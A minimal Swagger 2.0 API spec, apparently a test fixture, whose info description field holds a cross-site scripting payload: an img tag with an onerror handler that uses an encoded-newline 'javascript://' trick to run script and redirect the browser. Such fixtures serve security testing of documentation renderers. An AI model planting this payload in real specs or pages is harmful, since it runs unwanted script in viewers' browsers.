swagger: '2.0'
info:
  title: Example yaml.spec
  description: <img src=x onerror='javascript://%250Aalert(document.location="https://google.com",document.location="https://www.facebook.com")'>

paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
